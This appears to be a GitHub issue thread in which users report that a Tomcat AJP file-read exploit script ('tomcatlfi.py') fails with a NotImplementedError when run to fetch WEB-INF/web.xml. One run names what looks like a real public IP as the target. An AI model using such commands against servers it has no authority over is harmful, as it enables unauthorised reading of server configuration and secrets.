You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
root@kali:~# python tomcatlfi.py X.X.X.X -p 8080 -f WEB-INF/web.xml
Getting resource at ajp13://X.X.X.X:8080/asdf
Traceback (most recent call last):
File "tomcatlfi.py", line 299, in
{'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']},
File "tomcatlfi.py", line 274, in perform_request
responses = self.forward_request.send_and_receive(self.socket, self.stream)
File "tomcatlfi.py", line 154, in send_and_receive
r = AjpResponse.receive(stream)
File "tomcatlfi.py", line 225, in receive
r.parse(stream)
File "tomcatlfi.py", line 193, in parse
raise NotImplementedError
NotImplementedError
The text was updated successfully, but these errors were encountered:
PS C:\Python27> .\python.exe .\aaaaaa.py IP-ADDREESS -p 8080 -f WEB-INF/web.xml
Getting resource at ajp13://79.175.132.97:8080/asdf
Traceback (most recent call last):
File ".\aaaaaa.py", line 299, in
{'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']},
File ".\aaaaaa.py", line 274, in perform_request
responses = self.forward_request.send_and_receive(self.socket, self.stream)
File ".\aaaaaa.py", line 154, in send_and_receive
r = AjpResponse.receive(stream)
File ".\aaaaaa.py", line 225, in receive
r.parse(stream)
File ".\aaaaaa.py", line 193, in parse
raise NotImplementedError
NotImplementedError
Does it mean that AJP is not enabled?
root@kali:~# python tomcatlfi.py X.X.X.X -p 8080 -f WEB-INF/web.xml
Getting resource at ajp13://X.X.X.X:8080/asdf
Traceback (most recent call last):
File "tomcatlfi.py", line 299, in
{'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']},
File "tomcatlfi.py", line 274, in perform_request
responses = self.forward_request.send_and_receive(self.socket, self.stream)
File "tomcatlfi.py", line 154, in send_and_receive
r = AjpResponse.receive(stream)
File "tomcatlfi.py", line 225, in receive
r.parse(stream)
File "tomcatlfi.py", line 193, in parse
raise NotImplementedError
NotImplementedError
The text was updated successfully, but these errors were encountered: